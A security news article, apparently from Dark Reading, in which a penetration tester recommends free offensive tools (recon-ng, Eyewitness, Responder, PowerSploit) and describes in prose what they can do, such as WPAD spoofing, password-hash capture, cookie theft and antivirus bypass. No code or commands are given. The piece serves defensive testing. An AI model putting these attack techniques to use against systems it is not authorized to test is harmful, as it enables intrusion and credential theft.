Vulnerabilities / Threats // Advanced Threats
08:10 AM
John H. Sawyer
John H. Sawyer

Tech Insight: Free Tools For Offensive Security

A professional penetration tester offers a look at the latest free and open-source tools available for pen testing and offensive tactics.

There are a lot of excellent offensive security tools available online for free, thanks to open-source licenses and the security professionals who've created tools in an effort to give back to the community. But because they are created by individuals or open-source efforts without the marketing and promotion resources of a vendor, these tools may not be well known in the enterprise.

Two years ago I wrote a Tech Insight on offensive security tools that defenders can leverage to help find vulnerabilities and secure their environments. Today, I want to update that list with some currently available tools that should be included in every offensive and defensive security professional's toolbox.

I truly believe that a security professional focused on defense or offense must understand the tools and techniques used by the other side. Those who defend a network should be aware of the attacks they will face and the ways that attackers avoid detection. To become familiar with these approaches, they should try out some of these same attack methods.

Similarly, those focusing on offense must understand defensive strategies, different types of security controls, and the ways that defenders detect attacks. It's easier to detect an attack or evade detection when you know, firsthand, how the defenses work. If they understand offensive tools, defenders can proactively identify potential threats before they become a more serious problem.

A study of offensive methods also helps security teams find the easily exploitable vulnerabilities and fix them, so that future penetration tests can focus on scenario-based assessments tailored around the organization's specific threat profile.

Before we get into the latest tools specific to the four primary stages of penetration testing -- reconnaissance, mapping, vulnerability detection, and exploitation -- there are a couple of books and websites worth mentioning. The first is the Red Team Field Manual, or RTFM, which is essentially a "cheat sheet" of commands in printed form that can be a handy reference to keep in your backpack. If you like the cheat sheet format, then you'll probably like the RTFM book.

If you prefer a more detailed digital resource, I highly recommend the as an alternative. It can be accessed online or downloaded to your laptop. It has a wider breadth and depth of information compared to RTFM, is well organized, and is more likely to stay current. The PwnWiki is one of those GitHub repositories that I always update prior to going to a pen testing client site -- it ensures that I will have the most up-to-date content in case I need to reference it.

One book that definitely deserves mention is The Hacker Playbook: Practical Guide to Penetration Testing. It's the first book I've come across that has been written from the perspective of an actual penetration tester, and not someone who is simply repeating theory and listing tools with their main pages. While not an extensive guide on all the tools for every situation, it does a good job of taking the reader through the initial prep and on to the final goal.

Now let's look at some of the tools themselves. For the reconnaissance phase, the only tool I'll mention today is recon-ng. There are other tools and websites available, but recon–ng has matured quite a bit in the last year with updates and new modules (e.g., Facebook), making it one of the must-haves in an attacker's (and defender's) toolkit. When used head-to-head with similar tools, I've found that recon-ng discovers more valuable information. There is documentation available on the tool's site and a great presentation with live demonstrations from Tim Tomes's presentation at the 2013 DerbyCon conference.

During the mapping and vulnerability discovery phase, it's common to encounter a large number of web interfaces that need to be manually inspected. This can be time-consuming in a large environment, where you're likely to see 50 to 300+ HTTP servers. To expedite the process, PeepingTom and Eyewitness are two tools that can parse the XML output from Nmap and Nessus, connect to each identified HTTP(S) service, and take a screenshot.

Both tools will generate an HTML report that includes a screenshot, server headers, and a link to the website. It's quick and easy way to see what the interface looks like, and it provides more detail than simply searching Nmap output for http-title.

A common issue found in nearly every pen testing is a lack of controls around WPAD. WPAD is short for Web Proxy Autodiscovery Protocol and is how computers can automatically identify a web proxy and proxy configuration file on a local network. By default, Windows systems are configured to search for hosts named WPAD, making them easily susceptible to name-spoofing and man-in-the-middle attacks. Unless a company is using a proxy already and has disabled the automatic discovery, WPAD is almost always exploitable and has frustrated many a sysadmin.

Previously, I used Metasploit to spoof a WPAD host, serve up a wpad.dat file that pointed to my Burp proxy, and inject malicious code into HTTP traffic going to local machines. But that's all changed with the release of Trustwave Spiderlab's Responder tool. In addition to collecting password hashes that can be cracked or used as part of an SMB relay attack, Responder has full WPAD spoofing capabilities, the ability to steal cookies, can insert malicious HTML, and can replace EXE files being downloaded with a malicious executable file.

Another strong tool in the exploitation category is actually a suite of scripts for Windows Powershell. PowerSploit's scripts are designed to assist penetration testers with privilege escalation, bypassing antivirus, exfiltration, and code execution. Even in highly sensitive environments locked down with multiple layers of protection -- including antivirus and application whitelisting -- PowerSploit can be used because Powershell is a legitimate systems administration tool and rarely restricted.

With these tools -- as well as those I covered in the previous article -- enterprise defenders have a powerful arsenal to identify weak areas in their networks and demonstrate how these vulnerabilities can be exploited. Every tool listed is freely available and open-source. Security teams can easily take advantage of these tools to proactively find and fix potential vulnerabilities before a malicious attacker has a chance to exploit them.

Comment  | 
Print  | 
More Insights
Newest First  |  Oldest First  |  Threaded View
Marilyn Cohodas
Marilyn Cohodas,
User Rank: Strategist
5/21/2014 | 3:05:58 PM
Thanks for the great interview and live chat, JohnSawyer
For anyone who wants to get some additional insight about what it takes to be a penetration tester be sure to checkout Tim Wilson's Dark Reading radio interview with John: Day In The Life of a Penetration Tester. Lots of really interesting commentary from DR community members in the live chat that followed the broadcost. Here's the link.
User Rank: Moderator
5/21/2014 | 1:15:10 PM
Re: prevalence?
Hi, Kelly.

Thank you for the question. Which clients use the tools? Well, if they're a client, then they've likely been subjected to all the tools as part of the testing we've performed for them. Whether or not they're actually using them is hard to say. I know of several specific examples where client's security teams perform regular recon looking for compromised credentials, defaced sites, employees posting sensitive information, etc. For that, they use recon-ng.

The rest of the tools I've seen used during specific demonstrations to show other IT groups within the company vulnerabilities and to prompt the other groups to fix those issues. A lot of this depends on the size of the team, how mature the team is (and the company), are they stuck in reactive mode or do they have time for proactive tasks, and other similar team attributes.

I'd like to see more security teams taking advantage of these tools as I think it would open their eyes to issues they're vulnerable to and help them fix issues before having a 3rd party tester coming in so the 3rd party's time can be focused on critical, high risk areas.

User Rank: Moderator
5/21/2014 | 1:00:19 PM
Re: PwnWiki!
Hey, Ed. Thanks for the comment. PwnWiki is a great resource. It's definitely come in handy on a few different pen tests. I need to get my updates sent in sometime soon but just haven't had the time to sort through my notes and get them into a pull request.

Ed Moyle
Ed Moyle,
User Rank: Apprentice
5/20/2014 | 9:49:54 AM
Just wanted to say thanks for getting this started.  Nice to see PwnWiki getting some love.  
Kelly Jackson Higgins
Kelly Jackson Higgins,
User Rank: Strategist
5/19/2014 | 6:46:46 PM
John, do many of your enterprise clients use these tools today? 
User Rank: Apprentice
5/19/2014 | 1:22:16 PM
Very Helpful!
This article is very helpful i must say! Keep up the goof work!
Register for Dark Reading Newsletters
White Papers
Cartoon Contest
Write a Caption, Win a Starbucks Card! Click Here
Latest Comment: This is a secure windows pc.
Current Issue
Security Operations and IT Operations: Finding the Path to Collaboration
A wide gulf has emerged between SOC and NOC teams that's keeping both of them from assuring the confidentiality, integrity, and availability of IT systems. Here's how experts think it should be bridged.
Flash Poll
New Best Practices for Secure App Development
New Best Practices for Secure App Development
The transition from DevOps to SecDevOps is combining with the move toward cloud computing to create new challenges - and new opportunities - for the information security team. Download this report, to learn about the new best practices for secure application development.
Twitter Feed
Dark Reading - Bug Report
Bug Report
Enterprise Vulnerabilities
From DHS/US-CERT's National Vulnerability Database
Published: 2017-05-09
NScript in mpengine in Microsoft Malware Protection Engine with Engine Version before 1.1.13704.0, as used in Windows Defender and other products, allows remote attackers to execute arbitrary code or cause a denial of service (type confusion and application crash) via crafted JavaScript code within ...

Published: 2017-05-08
unixsocket.c in lxterminal through 0.3.0 insecurely uses /tmp for a socket file, allowing a local user to cause a denial of service (preventing terminal launch), or possibly have other impact (bypassing terminal access control).

Published: 2017-05-08
A privilege escalation vulnerability in Brocade Fibre Channel SAN products running Brocade Fabric OS (FOS) releases earlier than v7.4.1d and v8.0.1b could allow an authenticated attacker to elevate the privileges of user accounts accessing the system via command line interface. With affected version...

Published: 2017-05-08
Improper checks for unusual or exceptional conditions in Brocade NetIron 05.8.00 and later releases up to and including 06.1.00, when the Management Module is continuously scanned on port 22, may allow attackers to cause a denial of service (crash and reload) of the management module.

Published: 2017-05-08
Nextcloud Server before 11.0.3 is vulnerable to an inadequate escaping leading to a XSS vulnerability in the search module. To be exploitable a user has to write or paste malicious content into the search dialogue.

Dark Reading Radio
Archived Dark Reading Radio
In past years, security researchers have discovered ways to hack cars, medical devices, automated teller machines, and many other targets. Dark Reading Executive Editor Kelly Jackson Higgins hosts researcher Samy Kamkar and Levi Gundert, vice president of threat intelligence at Recorded Future, to discuss some of 2016's most unusual and creative hacks by white hats, and what these new vulnerabilities might mean for the coming year.